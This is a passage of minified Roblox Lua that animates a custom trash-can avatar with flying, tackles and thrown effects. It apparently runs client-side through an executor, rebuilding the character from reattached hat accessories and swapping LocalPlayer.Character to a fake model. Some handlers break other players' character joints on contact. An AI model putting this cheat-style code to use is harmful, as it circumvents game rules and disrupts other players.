Character.Trash:WaitForChild("Head").Attachment420.Position=Vector3.new(0,1,0)opencd=true;heli=true;bE=false;flying=true;cW:play''cV.Enabled=true;cy.Scale=Vector3.new(.5,.15,2)cA.Scale=Vector3.new(.5,.15,1)cz.Transparency=0;bg.Humanoid.WalkSpeed=bs;ck.maxForce=Vector3.new(0,1/0,0)ck.velocity=Vector3.new(0,0,0)elseif heli and opencd then heli=false;cV.Enabled=false;opencd=false;flying=false;cy.Scale=Vector3.new(.5,.1,1)cA.Scale=Vector3.new(.5,.1,1)cz.Transparency=1;cW:stop''bg.Humanoid.WalkSpeed=bs*.75;bE=true;ck.maxForce=Vector3.new(0,0,0)Character.Trash:WaitForChild("Head").Attachment420.Position=Vector3.new(0,0,0)end end;if d9=='q'then ck.velocity=Vector3.new(0,-25,0)end;if d9=='e'then ck.velocity=Vector3.new(0,20,0)end;if d9=='z'and not opencd then bJ=true end;if d9=='j'then game:GetService("Players").LocalPlayer.Character=game:GetService("Players").LocalPlayer.Character.Trash;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;if d9=='k'then game:GetService("Players").LocalPlayer.Character=M;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end;if d9=='y'then M.Trash:Remove()M:Remove()end;game:service'Debris':AddItem(grbg,5)if d9=='c'and not opencd and bE and not bJ then Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.lightbulb.Attachment1337.Position=Vector3.new(0,2.25,0)cC:play''opencd=true;cJ.Enabled=false;bG=true end end)K.KeyUp:connect(function(d9)if string.byte(d9)==48 and not bo then runnin=false end;if d9=='w'then bq.w=false end;if d9=='a'then bq.a=false end;if d9=='s'then bq.s=false end;if d9=='d'then bq.d=false end;if d9=='x'and bF and opencd then Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.boombox.Attachment666.Position=Vector3.new(0,0,0)bF=false;opencd=false end;if d9=='q'then ck.velocity=Vector3.new(0,0,0)end;if d9=='v'then bs=80 end;if d9=='b'then bs=16 end;if d9=='e'then ck.velocity=Vector3.new(0,0,0)end;if d9=='z'then bJ=false;if bK=="Table"then wait(0.2)bD=bD+1;if bD>#bR then bD=1 end;cF.Texture="http://www.roblox.com/asset?id="..bR[bD]-1 end end;if d9=='h'and bE and bo and not bJ and not opencd and bw=='Crouching'then bE=false;bw='SuperJump'local bv=Instance.new('BodyVelocity',bn)bv.maxForce=Vector3.new(0,1/0,0)bv.velocity=Vector3.new(0,300,0)game:service'Debris':AddItem(bv,.5)bg.Humanoid.JumpPower=120;wait'1'bg.Humanoid.Jump=true;if bw=='SuperJump'then bo=false;wait()bg.Humanoid.JumpPower=50 end end;if d9=='v'and bE and bo and not bJ then if not opencd then local db=Ray.new(cu.CFrame.p,(cu.CFrame.p-(cu.CFrame*CFrame.new(0,0,-1)).p).unit*2)local hit,dc=workspace:FindPartOnRay(db,bg)if hit and hit.Parent then opencd=true;if hit.Parent:IsA'Model'then for T,x in pairs(hit.Parent:GetChildren())do if x:IsA'Humanoid'then x.Sit=true;x.Health=x.Health-0*x.MaxHealth/100;cB:play''end end;if hit.Parent:findFirstChild('Torso')then local asd=Instance.new('BodyVelocity',hit.Parent.Torso)asd.velocity=(bn.CFrame*CFrame.new(0,4,1).p-bn.CFrame.p).unit*222 end end;wait'.5'opencd=false end end end;if d9=='c'and opencd and bG then Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.lightbulb.Attachment1337.Position=Vector3.new(0,0.70,0)opencd=false;bG=false;cJ.Enabled=false end end)local dd=NumberSequenceKeypoint.new;K.Button1Down:connect(function()if runnin and not bo and(bn.Velocity*Vector3.new(1,0,1)).magnitude>br-5 and not bC then bo=true;bC=true;bw="Tackle"bg.Humanoid.WalkSpeed=0;local bv=Instance.new('BodyVelocity',base)bv.Name='git gud'bv.maxForce=Vector3.new(1/0,0,1/0)bv.velocity=((bn.CFrame*CFrame.new(0,0,-3)).p-bn.CFrame.p).unit*(br+22*br/100)wait'1'bv:destroy''bo=false;wait'2'bC=false end;if not bI and bE and bo and not opencd and not bJ then opencd=true;bI=true;cC:play''local de=bU[math.random(1,#bU)]local grbg=Instance.new('Part',workspace)grbg.Name=de[1]grbg.formFactor=3;grbg.CFrame=base.CFrame*CFrame.new(0,4.5,-2)*CFrame.Angles(math.rad(math.random(1,180)),math.rad(math.random(1,180)),math.rad(math.random(1,180)))grbg.TopSurface=10;grbg.BottomSurface=10;grbg.LeftSurface=10;grbg.RightSurface=10;grbg.BackSurface=10;grbg.FrontSurface=10;grbg.CanCollide=false;grbg.Anchored=false;grbg.Anchored=false;grbg.Transparency=1;grbg.Locked=true;grbg.Size=Vector3.new(.2,.2,.2)local df=Instance.new("ParticleEmitter",grbg)df.Rate=500;df.Color=ColorSequence.new(bN,bO)df.Acceleration=Vector3.new(0,10,0)df.Lifetime=NumberRange.new(0.5,1)df.VelocitySpread=360;df.Enabled=true;df.Rotation=NumberRange.new(-15,15)df.RotSpeed=NumberRange.new(-25,25)df.Texture="http://www.roblox.com/asset?id=589325350"df.Size=NumberSequence.new({dd(0,1,0),dd(0.123,.85,0),dd(0.154,.7,0),dd(0.208,.55,0),dd(0.357,.4,0),dd(0.555,.25,0),dd(0.725,.1,0),dd(0.905,0,0),dd(1,0,0)})df.Transparency=NumberSequence.new({dd(0,0,0),dd(.1,.1,0),dd(.2,.2,0),dd(.3,.3,0),dd(.4,.4,0),dd(.5,.5,0),dd(.6,.6,0),dd(.7,7,0),dd(.8,.8,0),dd(.9,.9,0),dd(1,1,0)})local dg=Instance.new('Sound',grbg)dg.Volume=1;dg.Pitch=1;dg.SoundId="http://www.roblox.com/asset?id=144467617"local dh=Instance.new('Sound',grbg)dh.Volume=.5;dh.Pitch=1.05;dh.SoundId="http://www.roblox.com/asset?id="..de[5]local di=(K.Hit.p-(base.CFrame*CFrame.new(0,4.5,-2)).p).magnitude;grbg.Velocity=(K.Hit.p-(base.CFrame*CFrame.new(0,4.5,-2)).p).unit*di*1.25+Vector3.new(0,72.5,0)local dj=true;local dk=Instance.new('SpecialMesh',grbg)dk.MeshId="http://www.roblox.com/asset?id="..de[2]dk.TextureId="http://www.roblox.com/asset?id="..de[3]dk.Scale=de[4]grbg.Touched:connect(function(hit)if hit and hit.Parent and hit:IsA'Part'and hit.CanCollide and hit.Transparency<1 and dj then dj=false;dg:play''dh:play''grbg.Anchored=true;grbg.Transparency=1;game:service'Debris':AddItem(grbg,2)local dl=Instance.new('Part',workspace)dl.Name=de[1]dl.formFactor=3;dl.CFrame=CFrame.new(grbg.CFrame.x,grbg.CFrame.y,grbg.CFrame.z)dl.TopSurface=10;dl.BottomSurface=10;dl.LeftSurface=10;dl.RightSurface=10;dl.BackSurface=10;dl.FrontSurface=10;dl.CanCollide=false;dl.Anchored=true;dl.Transparency=1;dl.Locked=true;dl.Size=Vector3.new(.2,.2,.2)local dm=Instance.new("ParticleEmitter",dl)dm.Color=ColorSequence.new(bN,bO)dm.Rate=800;dm.Speed=NumberRange.new(35,40)dm.Acceleration=Vector3.new(0,-80,0)dm.Lifetime=NumberRange.new(1.5)dm.EmissionDirection="Top"dm.Transparency=NumberSequence.new({dd(0,0,0),dd(.1,.1,0),dd(.2,.2,0),dd(.3,.3,0),dd(.4,.4,0),dd(.5,.5,0),dd(.6,.6,0),dd(.7,7,0),dd(.8,.8,0),dd(.9,.9,0),dd(1,1,0)})dm.VelocitySpread=69;dm.Enabled=true;dm.Rotation=NumberRange.new(-15,15)dm.RotSpeed=NumberRange.new(-25,25)dm.Texture=df.Texture;dm.Size=NumberSequence.new({dd(0,2,0),dd(0.123,1.75,0),dd(0.154,1.5,0),dd(0.208,1.25,0),dd(0.357,1,0),dd(0.555,.75,0),dd(0.725,.5,0),dd(0.905,.25,0),dd(1,0,0)})df.Rate=0;for T,x in pairs(workspace:GetChildren())do if x:IsA'Model'and x:findFirstChild("Humanoid")and x:findFirstChild("Torso")and x:findFirstChild("Head")then if(x.Torso.Position-dl.Position).magnitude<=12 and x~=bg then end end end;wait'.2'dm.Rate=0;game:service'Debris':AddItem(dl,1)end end)wait'.2'opencd=false;wait'.6'bI=false end end)cu.Touched:connect(function(hit)if bo==true and bw=="Tackle"or bw=='SuperJump'and not hitdb and not hit.Parent:IsA'Hat'and hit.Name~='Base'then if bw=='SuperJump'then bo=false;bg.Humanoid.Jump=true end;hitdb=true;if hit and hit.Parent then if hit.Parent:IsA'Model'then for T,x in pairs(hit.Parent:GetChildren())do if x:IsA'Humanoid'then hit.Parent:breakJoints''cB:play''end end;if hit.Parent.Parent then for T,x in pairs(hit.Parent.Parent:GetChildren())do if x:IsA'Humanoid'then hit.Parent.Parent:breakJoints''cB:play''end end end end end;wait'.8'hitdb=false end end)game:service'RunService'.RenderStepped:connect(function()if bg:findFirstChild("Humanoid")and bl:findFirstChild("Weld")and bk:findFirstChild("Weld")and bm:findFirstChild("Weld")and bi:findFirstChild("Weld")and bj:findFirstChild("Weld")and bn:findFirstChild("Weld")then if bw~=bx then bB=0 end;bx=bw;bg.Humanoid.CameraOffset=bn.CFrame:toObjectSpace(cE.CFrame).p+Vector3.new(0,-1.25,0)bz=bz+.95;if not bo and not bp then if(torso.Velocity*Vector3.new(1,0,1)).magnitude<1 and not bg.Humanoid.Jump then bw="Idling"elseif(bn.Velocity*Vector3.new(1,0,1)).magnitude>1 and(bn.Velocity*Vector3.new(1,0,1)).magnitudebr-10 and not bg.Humanoid.Jump then bw="Sprinting"elseif torso.Velocity.y>5 and bg.Humanoid.Jump then bw='Jumping'elseif torso.Velocity.y<-5 and bg.Humanoid.Jump then bw='Falling'end end;if bo and bE and not bp and not flying then if(torso.Velocity*Vector3.new(1,0,1)).magnitude<1 then bw="Crouching"elseif(bn.Velocity*Vector3.new(1,0,1)).magnitude>1 then bw="Sneaking"end end;if bo and flying and not bp and not bE then if(torso.Velocity*Vector3.new(1,0,1)).magnitude<1 then bw="FlyIdle"cS.C0=CFrame.new(0,3.25,0)*CFrame.Angles(0,bz,0)elseif(bn.Velocity*Vector3.new(1,0,1)).magnitude>1 then bw="FlyForward"cS.C0=CFrame.new(0,3.25,0)*CFrame.Angles(0,bz,0)end else cS.C0=CFrame.new(0,0,0)end;if bw=="Idling"then idlesineinc=35;bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(1.4,.525,0)*CFrame.Angles(math.rad(175),0,math.rad(10)),.15)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-1.4,.525,0)*CFrame.Angles(math.rad(175),0,math.rad(-10)),.15)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.55,-1.9-math.cos(bz/idlesineinc)/20,math.cos(bz/idlesineinc)/35)*CFrame.Angles(-(math.cos(bz/idlesineinc)/35),0,math.rad(-2.5)),.1)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.55,-1.9-math.cos(bz/idlesineinc)/20,math.cos(bz/idlesineinc)/35)*CFrame.Angles(-(math.cos(bz/idlesineinc)/35),0,math.rad(2.5)),.1)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,1.5+math.cos(bz/idlesineinc)/50,0)*CFrame.Angles(math.cos(bz/idlesineinc)/40,0,0),.1)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-.1+math.cos(bz/idlesineinc)/20,0)*CFrame.Angles(math.cos(bz/idlesineinc)/35+math.rad(0),math.rad(0),math.rad(0)),.1)cL.C0=Lerp(cL.C0,CFrame.new(0,3.3,0)*CFrame.Angles(0,0,0),.15)end;if bw=="Walking"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(1.4,.525,0)*CFrame.Angles(math.rad(175),0,math.rad(10)),.15)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-1.4,.525,0)*CFrame.Angles(math.rad(175),0,math.rad(-10)),.15)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.55,-1.9-math.cos(bz/6)/10,-(math.cos(bz/6)/1.125))*CFrame.Angles(math.cos(bz/6)/1.125,0,math.rad(-2.5)),.1)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.55,-1.9-math.cos(bz/6)/10,math.cos(bz/6)/1.125)*CFrame.Angles(-(math.cos(bz/6)/1.125),0,math.rad(2.5)),.1)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,1.5+math.cos(bz/20)/50,0)*CFrame.Angles(-math.cos(bz/3)/20,0,0),.1)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-.1+math.cos(bz/3.375)/20,math.cos(bz/3)/5)*CFrame.Angles(math.cos(bz/3)/20+math.rad(-3.5),math.cos(bz/6)/10,-math.cos(bz/6)/30+math.sin(bn.RotVelocity.y/2)/7.5),.1)cL.C0=Lerp(cL.C0,CFrame.new(0,3.3,0)*CFrame.Angles(0,0,0),.15)end;if bw=="Sprinting"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(1.5,.525,0)*CFrame.Angles(-math.cos(bz/2.5)/10+math.rad(-55),0,math.rad(32.5)),.1)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-1.5,.525,0)*CFrame.Angles(-math.cos(bz/2.5)/10+math.rad(-55),0,math.rad(-32.5)),.1)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.55,-1.6-math.cos(bz/4)/4,-(math.cos(bz/4)*2)-math.rad(10))*CFrame.Angles(math.cos(bz/4)*2+math.rad(10),0,math.rad(-2.5)),.1)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.55,-1.6-math.cos(bz/4)/4,math.cos(bz/4)*2-math.rad(10))*CFrame.Angles(-(math.cos(bz/4)*2)+math.rad(10),0,math.rad(2.5)),.1)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,1.55+math.cos(bz/20)/50,0)*CFrame.Angles(-math.cos(bz/2.5)/10+math.rad(20),0,0),.1)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-.3+math.cos(bz/2.5)/15,math.cos(bz/2.5))*CFrame.Angles(math.cos(bz/2.5)/10+math.rad(-25),math.cos(bz/2.5)/10,math.cos(bz/4)/20+math.sin(bn.RotVelocity.y/2)/4),.1)cL.C0=Lerp(cL.C0,CFrame.new(2.5,0,2)*CFrame.Angles(0,1.5,0),.1)end;if bw=="Jumping"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(1.5,.525,0)*CFrame.Angles(math.rad(10),0,math.rad(50)),.1)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-1.5,.525,0)*CFrame.Angles(math.rad(10),0,math.rad(-50)),.1)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.55,-1.4,0)*CFrame.Angles(math.rad(-17.5),0,math.rad(-2.5)),.1)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.55,-1.1,-.1)*CFrame.Angles(math.rad(-17.5),0,math.rad(2.5)),.1)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,1.5+math.cos(bz/20)/50,0)*CFrame.Angles(math.cos(bz/20)/40,0,0),.1)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-.1+math.cos(bz/20)/20,0)*CFrame.Angles(math.rad(-15),math.rad(0),math.rad(0)),.1)cL.C0=Lerp(cL.C0,CFrame.new(0,0,0)*CFrame.Angles(0,0,0),.05)end;if bw=="Tackle"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(1.5,.525,0)*CFrame.Angles(math.rad(10),0,math.rad(50)),.1)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-1.5,.525,0)*CFrame.Angles(math.rad(10),0,math.rad(-50)),.1)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.55,-1.4,0)*CFrame.Angles(math.rad(-17.5),0,math.rad(-2.5)),.1)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.55,-1.4,0)*CFrame.Angles(math.rad(-17.5),0,math.rad(2.5)),.1)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,1.5,0)*CFrame.Angles(math.cos(bz/20)/40,0,0),.1)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-1.5,0)*CFrame.Angles(math.rad(-90),math.rad(0),math.rad(0)),.1)cL.C0=Lerp(cL.C0,CFrame.new(0,0,0)*CFrame.Angles(0,0,0),.05)end;if bw=="Falling"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(1.5,.525,0)*CFrame.Angles(math.rad(10),0,math.rad(70)),.035)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-1.5,.525,0)*CFrame.Angles(math.rad(10),0,math.rad(-70)),.035)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.55,-1.2,0)*CFrame.Angles(math.rad(-14),0,math.rad(-2.5)),.035)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.55,-1.9,0)*CFrame.Angles(math.rad(0),0,math.rad(2.5)),.035)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,1.5,-.3)*CFrame.Angles(math.rad(-40),0,0),.035)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-.1+math.cos(bz/20)/20,0)*CFrame.Angles(math.rad(10),math.rad(0),math.rad(0)),.035)cL.C0=Lerp(cL.C0,CFrame.new(0,0,0)*CFrame.Angles(0,0,0),.05)end;if bw=="SuperJump"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(1.4,.525,0)*CFrame.Angles(math.rad(175),0,math.rad(10)),.15)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-1.4,.525,0)*CFrame.Angles(math.rad(175),0,math.rad(-10)),.15)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.55,-1.5,0)*CFrame.Angles(math.rad(-17.5),0,math.rad(-2.5)),.15)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.55,-1.5,0)*CFrame.Angles(math.rad(-17.5),0,math.rad(2.5)),.15)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,1.5,0)*CFrame.Angles(0,0,0),.15)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-1,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),.15)cL.C0=Lerp(cL.C0,CFrame.new(0,3,0)*CFrame.Angles(0,0,0),.15)end;if bw=="Crouching"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(.5,.5,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-.5,.5,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.5,0,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.5,0,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,-0.1,0)*CFrame.Angles(0,0,0),.1)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-1.75,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),.15)cL.C0=Lerp(cL.C0,CFrame.new(0,0,0)*CFrame.Angles(0,0,0),.05)end;if bw=="Sneaking"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(.5,.5,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(-.5,.5,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.55,-.8-math.cos(bz/6)/8,-(math.cos(bz/6)/1.75))*CFrame.Angles(math.cos(bz/6)/1.75,0,math.rad(-2.5)),.15)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.55,-.8-math.cos(bz/6)/8,math.cos(bz/6)/1.75)*CFrame.Angles(-(math.cos(bz/6)/1.75),0,math.rad(2.5)),.15)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,-0.1,0)*CFrame.Angles(0,0,0),.1)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-1.2,0)*CFrame.Angles(math.rad(-5),math.rad(0),math.cos(bz/6)/20),.1)cL.C0=Lerp(cL.C0,CFrame.new(0,0,0)*CFrame.Angles(0,0,0),.05)end;if bw=="FlyIdle"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(0,.5,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(0,.5,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.5,0,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.5,0,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,1.5,-0.2)*CFrame.Angles(0,0,0),.1)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-1.75-math.cos(bz/17.5),0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),.05)cL.C0=Lerp(cL.C0,CFrame.new(0,0,0)*CFrame.Angles(0,0,0),.05)end;if bw=="FlyForward"then bl.Weld.C0=Lerp(bl.Weld.C0,CFrame.new(0,.5,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bk.Weld.C0=Lerp(bk.Weld.C0,CFrame.new(0,.5,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bi.Weld.C0=Lerp(bi.Weld.C0,CFrame.new(-.5,0,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bj.Weld.C0=Lerp(bj.Weld.C0,CFrame.new(.5,0,0)*CFrame.Angles(math.rad(0),0,math.rad(0)),.1)bm.Weld.C0=Lerp(bm.Weld.C0,CFrame.new(0,1.5,-0.2)*CFrame.Angles(0,0,0),.1)bn.Weld.C0=Lerp(bn.Weld.C0,CFrame.new(0,-1.75-math.cos(bz/17.5),0)*CFrame.Angles(math.rad(-12),math.rad(0),math.rad(0)),.05)cL.C0=Lerp(cL.C0,CFrame.new(0,0,0)*CFrame.Angles(0,0,0),.05)end;if opencd and bo then cO.C0=Lerp(cO.C0,CFrame.new(0,1.8,-0.3)*CFrame.Angles(math.rad(85),math.rad(0),math.rad(0)),.222)music.Volume=TwnSingleNumber(music.Volume,2,.2)elseif not opencd and not bJ then music.Volume=TwnSingleNumber(music.Volume,.025,.05)elseif not opencd and bJ then music.Volume=TwnSingleNumber(music.Volume,2,.05)end;if bF then cQ.C0=Lerp(cQ.C0,CFrame.new(0,1.9,.2)*CFrame.Angles(math.rad(15),math.rad(0),math.rad(0)),.222)else cQ.C0=Lerp(cQ.C0,CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),.075)end;if bG then cR.C0=Lerp(cR.C0,CFrame.new(0,1.7,0)*CFrame.Angles(math.rad(-15),math.rad(0),math.rad(0)),.222)cJ.Range=TwnSingleNumber(cJ.Range,16,.1)else cR.C0=Lerp(cR.C0,CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),.075)cJ.Range=0 end;if bJ then cP.C0=Lerp(cP.C0,CFrame.new(0,2.2,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),.075)cO.C0=Lerp(cO.C0,CFrame.new(0,1.15,-0.3)*CFrame.Angles(math.rad(60),math.rad(0),math.rad(0)),.15)else BOM:Play()cP.C0=Lerp(cP.C0,CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),.15)cO.C0=Lerp(cO.C0,CFrame.new(0,0,0)*CFrame.Angles(math.rad(0),math.rad(0),math.rad(0)),.075)end;if runnin and not bo and not bp then bg.Humanoid.WalkSpeed=br elseif not runnin and not bo and not bp then bg.Humanoid.WalkSpeed=bs end end end)end;do player=owner or game:GetService("Players").LocalPlayer;chatted=false;player.Chatted:connect(message)end;wait()wait(2)n2:Destroy()wait()W(R.torso.Handle,Character.Trash["Torso"])W(S.head.Handle,Character.Trash["Head"])W(S.box.Handle,Character.Trash.trueMetalGearBox.nostap.itstimetostopp.Can2)W(S.vibe.Handle,Character.Trash.trueMetalGearBox.nostap.itstimetostopp.cricri)W(S.rain.Handle,Character.Trash.trueMetalGearBox.nostap.itstimetostopp.lightbulb)W(S.knife.Handle,Character.Trash.trueMetalGearBox.nostap.itstimetostopp.boombox)W(R.rightarm.Handle,Character.Trash["Right Arm"])W(R.leftarm.Handle,Character.Trash["Left Arm"])W(R.rightleg.Handle,Character.Trash["Right Leg"])W(R.leftleg.Handle,Character.Trash["Left Leg"])S.box.Handle.Attachment.Rotation=Vector3.new(0,0,0)S.vibe.Handle.Attachment.Rotation=Vector3.new(-90,0,0)S.knife.Handle.Attachment.Rotation=Vector3.new(0,0,-90)R.torso.Handle.Attachment.Rotation=Vector3.new(0,0,0)S.head.Handle.Attachment.Rotation=Vector3.new(0,0,0)R.rightarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftarm.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.rightleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)R.leftleg.Handle.Attachment.Rotation=Vector3.new(90,0,0)Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.Can2:FindFirstChild("Attachment").Name="Attachment69"Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.cricri:FindFirstChild("Attachment").Name="Attachment360"Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.lightbulb:FindFirstChild("Attachment").Name="Attachment1337"Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.boombox:FindFirstChild("Attachment").Name="Attachment666"Character.Trash:WaitForChild("Head"):FindFirstChild("Attachment").Name="Attachment420"Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.Can2.Attachment69.Position=Vector3.new(0,0.47,0)Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.cricri.Attachment360.Position=Vector3.new(0,0,1)Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.lightbulb.Attachment1337.Position=Vector3.new(0,0.70,0)Character.Trash:WaitForChild("trueMetalGearBox").nostap.itstimetostopp.boombox.Attachment666.Position=Vector3.new(0,0,0)game["Run Service"].Stepped:connect(function()Character.Trash.trueMetalGearBox.nostap.itstimetostopp.lightbulb.Rotation=Vector3.new(0,0,0)end)coroutine.resume(coroutine.create(function()while true do wait(0.05)S.rain.Handle.Attachment.Rotation=Vector3.new(0,45,0)wait(0.05)S.rain.Handle.Attachment.Rotation=Vector3.new(0,90,0)wait(0.05)S.rain.Handle.Attachment.Rotation=Vector3.new(0,135,0)wait(0.05)S.rain.Handle.Attachment.Rotation=Vector3.new(0,180,0)wait(0.05)S.rain.Handle.Attachment.Rotation=Vector3.new(0,225,0)wait(0.05)S.rain.Handle.Attachment.Rotation=Vector3.new(0,270,0)wait(0.05)S.rain.Handle.Attachment.Rotation=Vector3.new(0,315,0)wait(0.05)S.rain.Handle.Attachment.Rotation=Vector3.new(0,0,0)end end))function dieded()M.Trash.Humanoid.Health=0;M.Humanoid.Health=0 end;M.Humanoid.Died:Connect(dieded)M.Trash.Humanoid.Died:Connect(dieded)p=Character.Trash.trueMetalGearBox.nostap.itstimetostopp:GetChildren()for T=1,#p do p[T].Transparency=1;p[T].CanCollide=false end;Character.Trash.Head.PseudoHead.Transparency=1;Character.Trash.Head.PseudoHead.CanCollide=false;game:GetService("Players").LocalPlayer.Character=game:GetService("Players").LocalPlayer.Character.Trash;game:GetService("Workspace").Camera.CameraSubject=game:GetService("Players").LocalPlayer.Character end)end;function Clickey4()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local R={Gun=Character:WaitForChild("RightMk73LP")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()end;rs=game:GetService("Players").LocalPlayer.Character.Torso["Right Shoulder"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Right Shoulder"]:Destroy()rs.Parent=game:GetService("Players").LocalPlayer.Character.Torso;rs.Part0=game:GetService("Players").LocalPlayer.Character.Torso;rs.Part1=game:GetService("Players").LocalPlayer.Character["Right Arm"]:Clone()game:GetService("Players").LocalPlayer.Character["Right Arm"].Name="ra"rs.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Right Arm"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["ra"])local dq=Instance.new("HingeConstraint",game:GetService("Players").LocalPlayer.Character["Right Arm"])dq.Attachment0=dn;dq.Attachment1=dp;dq.LimitsEnabled=true;dq.LowerAngle=0;dq.Restitution=0;dq.UpperAngle=0;ls=game:GetService("Players").LocalPlayer.Character.Torso["Left Shoulder"]:Clone()game:GetService("Players").LocalPlayer.Character.Torso["Left Shoulder"]:Destroy()ls.Parent=game:GetService("Players").LocalPlayer.Character.Torso;ls.Part0=game:GetService("Players").LocalPlayer.Character.Torso;ls.Part1=game:GetService("Players").LocalPlayer.Character["Left Arm"]:Clone()game:GetService("Players").LocalPlayer.Character["Left Arm"].Name="la"ls.Part1.Parent=game:GetService("Players").LocalPlayer.Character;local dn=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["Left Arm"])local dp=Instance.new("Attachment",game:GetService("Players").LocalPlayer.Character["la"])local 